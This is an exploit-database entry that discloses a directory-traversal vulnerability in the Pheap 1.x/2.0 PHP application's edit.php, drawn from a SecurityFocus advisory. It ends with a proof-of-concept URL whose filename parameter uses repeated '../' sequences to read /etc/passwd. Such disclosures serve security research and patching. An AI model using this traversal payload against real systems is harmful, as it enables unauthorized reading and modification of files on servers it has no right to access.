Pheap 1.x/2.0 - 'edit.php' Directory Traversal

EDB-ID:

29635




Platform:

PHP

Date:

2007-02-22


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/22670/info

Pheap is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve and edit the contents of arbitrary files from the vulnerable system in the context of the affected application. 

http://www.example.com/edit.php?em=file&filename=../../../../../../../../../../../../../etc/passwd